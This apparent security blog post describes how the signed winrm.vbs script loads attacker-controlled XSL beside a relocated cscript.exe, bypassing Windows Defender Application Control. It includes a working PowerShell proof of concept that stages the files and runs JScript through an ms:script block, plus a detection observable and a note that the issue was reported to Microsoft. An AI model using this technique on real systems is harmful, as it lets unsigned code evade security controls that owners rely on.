
Microsoft winrm.vbs Security Bypass

winrm.vbs (a Microsoft-signed script shipped in System32) consumes and executes attacker-controlled XSL. XSL loaded this way is not subject to the “enlightened script host” restrictions that Windows Defender Application Control places on cscript.exe/wscript.exe, so the result is arbitrary unsigned code execution.

When “-format:pretty” or “-format:text” is supplied to winrm.vbs, it loads WsmPty.xsl or WsmTxt.xsl respectively from the directory in which the running cscript.exe resides, not from System32. An attacker who copies cscript.exe (which remains validly signed) to a directory they control and places a malicious WsmPty.xsl or WsmTxt.xsl beside it therefore obtains arbitrary unsigned code execution. The issue is effectively identical to Casey Smith’s wmic.exe XSL technique.
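
The staging steps described above, as an added PowerShell example that is not part of the original post or of the researcher's published proof of concept. The staging directory, the calc.exe payload and the Win32_Process query used to drive winrm.vbs are assumptions; the XSL uses the same msxml `ms:script` extension that the wmic.exe technique relies on. Run it only on a test VM you own.

```powershell
# Added example (not from the original post): stage a copy of cscript.exe next to
# an attacker-controlled WsmPty.xsl and let the signed winrm.vbs load it via
# -format:pretty. Staging path, payload and query are assumptions.

$Stage = 'C:\Temp\WinRMBypass'   # assumed attacker-controlled directory
New-Item -ItemType Directory -Path $Stage -Force | Out-Null

# 1. Copy the signed script host out of System32. The copy keeps its Microsoft
#    signature, so a publisher- or hash-based allow rule still permits it.
Copy-Item "$env:SystemRoot\System32\cscript.exe" -Destination $Stage -Force

# 2. Drop WsmPty.xsl beside the copied host. winrm.vbs resolves this file
#    relative to the running cscript.exe, not relative to System32. Top-level
#    JScript inside <ms:script> runs when the stylesheet is processed, before
#    any output is formatted, which is what makes it a code-execution primitive.
$Xsl = @'
<?xml version="1.0"?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
      // Assumed benign payload for the demo; any script-host code runs here,
      // outside the enlightened-script-host restrictions WDAC would apply.
      var shell = new ActiveXObject("WScript.Shell");
      shell.Run("calc.exe");
    ]]>
  </ms:script>
</stylesheet>
'@
Set-Content -Path (Join-Path $Stage 'WsmPty.xsl') -Value $Xsl -Encoding ASCII

# 3. Run the genuine, signed winrm.vbs from System32 under the relocated host.
#    The query itself is arbitrary; -format:pretty is what triggers the XSL load.
#    (winrm.vbs talks to the local WinRM service; if the query errors out before
#    formatting, run "winrm quickconfig" on the test VM first.)
& (Join-Path $Stage 'cscript.exe') //nologo "$env:SystemRoot\System32\winrm.vbs" `
    get wmicimv2/Win32_Process?Handle=4 -format:pretty
```

Note what a policy sees here: both binaries on the command line (the relocated cscript.exe and winrm.vbs in System32) are Microsoft-signed, and the only unsigned artefact is an .xsl file that no code-integrity rule inspects. The useful observable for detection follows from the same mechanism the post describes: a cscript.exe image running from a path outside System32 or SysWOW64 with winrm.vbs and -format:pretty or -format:text on its command line.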

Because this technique bypasses Windows Defender Application Control (a security feature that Microsoft services through MSRC), the issue was reported to Microsoft.

Further details – https://paper.tuisec.win/detail/40fb1eeac18a75d

Duncan

Duncan is a technology professional with over 20 years’ experience of working in various IT roles. He has an interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.
